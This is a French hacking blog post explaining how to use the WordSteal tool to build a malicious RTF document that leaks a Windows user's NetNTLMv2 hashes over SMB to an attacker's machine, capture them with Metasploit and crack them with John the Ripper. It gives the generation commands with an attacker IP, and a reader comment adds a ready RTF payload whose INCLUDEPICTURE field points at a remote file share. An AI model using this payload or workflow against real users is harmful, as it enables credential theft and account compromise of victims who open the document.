Comment obtenir le mot de passe d’un utilisateur Windows grâce à un document Office ?

By | April 16, 2017

WordSteal est un script qui peut générer des documents Office malicieux capables d’obtenir des hashes NTLM d’un utilisateur Windows. Pour ce faire, le script utilise une faille connue dans le protocole SMB de Windows.

Vous pouvez télécharger l’outil hacking à partir de son repo GitHub à l’aide de la commande ci-dessous:

$ https://github.com/0x090x0/WordSteal.git

Entrez dans le dossier téléchargé, puis changez les permissions sur le script main.py.

$ chmod 777 main.py

Pour réaliser ce hack, il faut fournir à WordSteal un fichier image qu’il convertira en document rtf (Rich Text Format), type de format de document propriétaire développé par Microsoft.
Nous réaliserons ce test avec l’image dd.jpg.

image

Plaçons l’image dans le dossier wordsteal puis exécutons la commande ci-dessous pour générer le fichier rtf malicieux.

$ python main.py 192.168.1.13 dd.jpg 1

192.168.1.13 pour l’adresse IP de la machine,
_ dd.jpg pour l’image qui sera utilisée,
1 pour activer le listenner.

Le script génère un fichier 1492265063.rtf, puis fait appel au module auxiliary/server/capture/smb de Metasploit avec johnpwfile comme option passwords pour sauvegarder les hashes NTML dans le format de John The Ripper.

fichier rtf généré

exécution du script main.py avec arguments

Dès que la cible clique sur le fichier rtf, une session metasploit s’exécute. Quelques instants plutard, dans le dossier wordsteal un fichier password_netntlmv2 est sauvegardé. Ce fichier contient les hashes capturés.

obtention des hashes NTMLv2

fichier password_netntlmv2 créé

La dernière étape consiste à lancer une attaque par force brute offline à l’aide de John the Ripper.
Pour notre test, le mot de passe de notre victime est azerty.

attaque par brute force avec John

Happy Hacking !

mdestroy

One thought on “Comment obtenir le mot de passe d’un utilisateur Windows grâce à un document Office ?

  1. none

    hello

    j’ai test, c’est fun. Après le lien vers l’image n’a pas besoin d’être valide
    exemple de fichier RTF

    {\rtf1{\field{\*\fldinst {INCLUDEPICTURE “file://192.168.200.73/xxxx.png” \\* MERGEFORMAT\\d}}{\fldrslt}}}

    ca passe

    à voir si possible dans xlsx et docx … 😀

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *